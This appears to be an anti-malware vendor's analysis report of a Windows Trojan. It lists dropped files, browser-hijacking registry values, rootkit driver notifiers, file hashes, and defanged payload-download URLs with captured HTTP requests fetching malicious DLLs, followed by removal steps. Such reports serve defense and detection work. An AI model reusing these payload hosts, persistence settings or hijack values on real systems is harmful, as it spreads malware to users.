C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C9C0AB304A24D626A01D04F597B8F4DA1C0BB353 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0VR58838.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D3620E4C550741E4DDAEC4D0AB078C93B1727686 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\45B87FD3EF6A4D430DA29B1C188A4A5FAFC69C3C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4F47793AB96483D552603451EF223EFE9EFAB646 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5D44AC703C53CC7EE6356F698FD1B03DA81FFE47 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\CBA2520DD31049525B64F21BBF7476F4E2AC1945 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\59FYE1S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\_CACHE_CLEAN_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\53EACA4C6576AB60F419E74ED41F7A38AECF13D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B4F9F19B69C223FD86BA246F4F451CE4FDC81D36 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A2F1ABCE909764E5E04E373F145C9C3886BAF96B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\97A235A1B13145568E910503A58B8E76054337B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache\startupCache.4.little (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8FF14B3918ED9F95C48889D4B31C7D7F6E5F0764 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\03Z3OHNC.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\49BE32824E0BEC3A9A307F5D676B110AE86F1525 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LXL295FY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B7B9989DD0CA3B12797AAA0DED4830817A18AF46 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\index (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C3357B699A03D6C47624A0BC4184ED6E2B8D6443 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B5C4975322F4602AB10B7CA78508940BDD035CA4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KCULDY7L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AE2CE72866097CB9D30937BE22EDFC3338CFF98D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0D043EB989F0FC6687A4FE1945189BE609121C27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SHMEGTHE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C7BC478C975246AA379BD2F61AE321CCCC3810B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6FD573E2D36B9D3C24362667556816AF31DA3541 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\84695AE0389FC766A8E02D06319A5484EC0EA303 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KUZ61ORW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_MAP_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F8AC72083E334F70A553AE68455FBDF0E65C5221 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C489C169C7BEFDF8E1C92A8B42A536E07094BFB3 (0 bytes)
C:\Windows\DkVcUC\BuSsSLo.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\637008686606A1B97226747F72405A0455707B8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KK0IK9EV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\19829C5A0B960EA3263403EFD05B9EB93E557CA3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z40SB5AS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4A0EC69D76B2B80C39B49E6A9B3E7D14DFBD935B (0 bytes)

The process %original file name%.exe:3504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\tIyAnb\0a45cf92610ba8fb67ae0b721564c6f.exe (7946 bytes)
C:\Windows\qRQPeAV.dll (12 bytes)

The Trojan deletes the following file(s):

C:\Windows\qRQPeAV.dll (0 bytes)

Registry activity

The process 0a45cf92610ba8fb67ae0b721564c6f.exe:2072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"ShortcutBehavior" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"
"Start Page" = "https://www.hao123.com/?tn=90117059_hao_pg"

[HKLM\System\CurrentControlSet\services\HHprlNomWu1]
"Devname" = "HHprlNomWu1T"
"ErrorControl" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90117059_hao_pg"

[HKLM\System\CurrentControlSet\services\HHprlNomWu1]
"Start" = "3"
"Type" = "1"
"ImagePath" = "\DosDevices\C:\Windows\system32\205bd5\CDClient_EX.sys"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "1"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL" = "https://www.baidu.com/s?word={searchTerms}&tn=90117059_hao_pg&ie=utf-8"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]

Dropped PE files

MD5 File path
b2b69786120ca206040dc1f196f77b42 c:\Users\"%CurrentUserName%"\AppData\Local\tIyAnb\0a45cf92610ba8fb67ae0b721564c6f.exe
89d67caa050c7cdcd0d25617570c5100 c:\Windows\DkVcUC\FseFDmQKm.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\C:\Windows\system32\205bd5\If56Km8kP8g.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\205bd5\If56Km8kP8g.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\205bd5\If56Km8kP8g.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\DosDevices\C:\Windows\system32\205bd5\If56Km8kP8g.sys" the Trojan controls operations with a system registry by installing the registry notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 294912 114176 5.54392 06ea146fe26cb37412e89ce6d48ea834
DATA 299008 888832 886784 5.54487 4507b650158851d62f89f35a17644d57
BSS 1187840 4096 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 1191936 8192 2048 5.15887 7381749142e6c42224f7e8ffc3b578a3
.tls 1200128 4096 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 1204224 4096 512 0.146134 3b0b537a506030303210ee9871d43d59
.reloc 1208320 24576 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 1232896 20480 5120 4.8226 9e34fdd448a6e7746869bb54d2b254bd
.aspack 1253376 12288 9216 4.24933 4efe0aeb378ec085eea976a14bec9063
.adata 1265664 4096 0 0 d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 3
4f7305d3dbf2478302a823fdfd26cf10
8f1cb58a968697f40fd310b31cd8fdb4
c8da1b064c8e3d3d81bed7bc7f436ee9

URLs

URL IP
hxxp://www.58sky.com/index/getcfg?id=44308 119.97.143.22
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll
hxxp://5636.ecoma.ourwebpic.com/
hxxp://wdx.go890.com/d2/x86.dll 87.245.198.83
hxxp://www.go890.com/d2/CDClient.dll 87.245.198.83
hxxp://www.ip138.com/ 87.245.198.83


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /d2/x86.dll HTTP/1.1
Host: wdx.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 08:25:20 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 03:09:39 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y
..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y..
.y..\yRich..\y........................PE..L....m`X...........!........
........P.....................................................@.......
..........................x...........x...................p...........
............................$...H.....................................
......UPX0....................................UPX1....................
............@....rsrc...............................@.................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.91.UPX!.......RXh...o..O...."..&.......U..j.h..!P..Y.d...P...
SV....W..0.1E.3.P.E...e.3o.....u.(0.E......x...........;.....f.y,.su.A
0....nt......Nuf.P..tTuY....,dDuL.lLl.$.u?.2.x..u,,...l..........<.
.....<...q........L....o.d....E.......M........Y_^[..]........p....
.Y..MZ.9.t.j2.o..J.<...8PE.u..........2..E...d.V....?X..u..I.N..t0.
....:.u.A.M.B.U...w......... ...)d.B....?...v.....d$...........u.i ..B
..r!C.3...0}..@..}.......9........&..t..C<.D.x...3<...;.u.|.H.^.
..e{ .......@$<.......V.L..3.m.;}.sZ....F&......U.;.....u0Q.U.M
<<< skipped >>>


GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 09:05:34 GMT
Server: kangle/2.9.6
Last-Modified: Tue, 03 Jan 2017 07:42:38 GMT
Content-Type: application/octet-stream
Content-Length: 891904
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
DUP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.....R..........@a.......p....@.................................A.....
..................................T........p..m.......................
......................................................................
..............CODE.....`.......t......PEC2^O...... ....rsrc....0...p..
."...x.............. ....reloc..............................@.........
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................M...b.. .........c....X...
......b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7i..
...8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.*{?
..@...a..w..Q.s...."..\...3KO.w.....V.....^.#b.l......<.q.C<....
...].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K........e
.Gi..A>.L..j3..{..=.....Q.fG.{...?.A.G.q...Q............9..\..R....
...O.....X}...5..(..q0..g>....U..!...G:5t...n.'9..M.....~&.h.ay#NA%
@....X.=x.....;.r~...FW.....)3.....=..3..L.....CZTX..`......... ..
<<< skipped >>>


GET /index/getcfg?id=44308 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 
Server: nginx/1.6.0
Date: Tue, 03 Jan 2017 11:21:10 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip
400a..............[..H..._.,..C%..D...UW.y......cm.... ........|...<
;]v....3|....u.../.....e...._....~==......./!..m.........~.Wer.6.*._..
._....u...Q..\..G...../.........%..'.....S.n.B...m....D....wk..M^....^
.<.3.lX]..0.e......?..9.On.&mZ..../2.cr...g.....|.....I..O.....ofJV
.n.Jo..7..'..`o&..ovQ1........6...kZ$.......n.F..."....Yw.'...........
/{.`..p...}v...7.v;..=...?.._..?..o.............q.A..m............_...
....._..7.q.;;...|...V.j.7.c...@u*.-....................zo.g......]rv.
....3..TD..I1}......x..9?..R&.y......k.].U.....}w.O<.<.V$)s..kvo
.n...:......b........p...5.}..<gg..I..y.|)..n... }%9.m.s^.G...=....
'......m......5K2..o...9....H......*SL..../....._.._.5...._.......G.._
.&........?....o.....:7............?wm.u.'..y. RP.?.o............~...k
....._.....;o..yc...w..;....5...........w._..n&D..o.....).n...9.|.....
..a..GB..4...(.I.P....UV.u..B....~z...........e....P.............[..Y.
...y..U..w{.dd..}.iu..G.....<..>'@_...=..4..v9........goi..:=.p8
...i...l...%...n..=..Y.....YG..............F....TYt.B..5(C......i.[.L.
..iy..f..Xv..*9?....tI%.@.....e.cy>..-...3"....d..\..4.:.{..E..C.q.
..#.....{7.;J..#{Z.=.Kg.......Cw*..G.kN..4...J=..".....~........^.t.-7
...V..i31.`H...9xL..y$.,q...b.&@...>3...>..?/w.pz.3_EviS9.f.f,i.
...s........'dY.H>^.u...]...<%..'..}...~.I..u..q.9..Y^..r.d.....
..s........@Kz[Ztw.z......9_.y.o#N...d.>.....i.w..r.....&*.`L......
"^......?.....>....>YL(.......Y"..C.w...@Z.{`..o.J.0._1.a.~.a...
r..... z.Wt.....b....vN....4o.x.mq..{}....<...G.....e.,..1....(
<<< skipped >>>


GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 03:51:43 GMT
Content-Length: 19213
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Thu, 29 Dec 2016 03:16:04 GMT
Accept-Ranges: bytes
ETag: "aebe84e38161d21:14727"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 26986
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE html>..<html>...<head>....<meta charset
="gb2312">....<meta name="mobile-agent" content="format=html5; u
rl=hXXp://m.ip138.com/">....<title>IP........--..............
.... | ............ | ............ | ........................</titl
e>....<meta name="keywords" content="ip,IP....,IP........,ip138"
/>....<meta name="description" content="ip,IP....,IP........,ip1
38"/>....<script type="text/javascript">.....<!--......if(
window.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com
/';.....//-->....</script>....<style type="text/css">..
. ..html{color:#000;background:#FFF}body,div,dl,dt,dd,ul,ol,li,h1,h3,h
3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,t
h,td{margin:0;padding:0}table{border-collapse:collapse;border-spacing:
0}fieldset,img{border:0}address,caption,cite,code,dfn,em,strong,th,var
{font-style:normal;font-weight:normal}ol,ul{list-style:none}caption,th
{text-align:left}h1,h3,h3,h4,h5,h6{font-size:100%;}q:before,q:after{co
ntent:''}abbr,acronym{border:0;font-variant:normal}sup{vertical-align:
text-top}sub{vertical-align:text-bottom}input,textarea,select{font-fam
ily:inherit;font-size:inherit;font-weight:inherit;*font-size:100%}lege
nd{color:#000}.....html{height:100%;}.....body{height: 100%;font-size:
 14px;}.....table{table-layout:fixed;border-collapse: collapse;border-
spacing: 0;margin: 0 auto;}.....input,button{font-family: Tahoma,Arial
, Helvetica,"Microsoft Yahei";}.....a{color: #1c5f82;text-decorati
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

SearchProtocolHost.exe_1708:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_2344:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    0a45cf92610ba8fb67ae0b721564c6f.exe:2072
    %original file name%.exe:3504

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
    C:\Windows\DkVcUC\FseFDmQKm.dll (264 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Windows\System32\205bd5\CDClient_EX.sys (117 bytes)
    C:\Windows\CLOG.txt (87 bytes)
    C:\Windows\ecQMJQN.dll (12 bytes)
    C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
    C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
    C:\Windows\DkVcUC\oyARLxIYS.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
    C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\tIyAnb\0a45cf92610ba8fb67ae0b721564c6f.exe (25 bytes)
    C:\Windows\3.txt (864 bytes)
    C:\Windows\DkVcUC\BuSsSLo.dll (15394 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Windows\qRQPeAV.dll (12 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

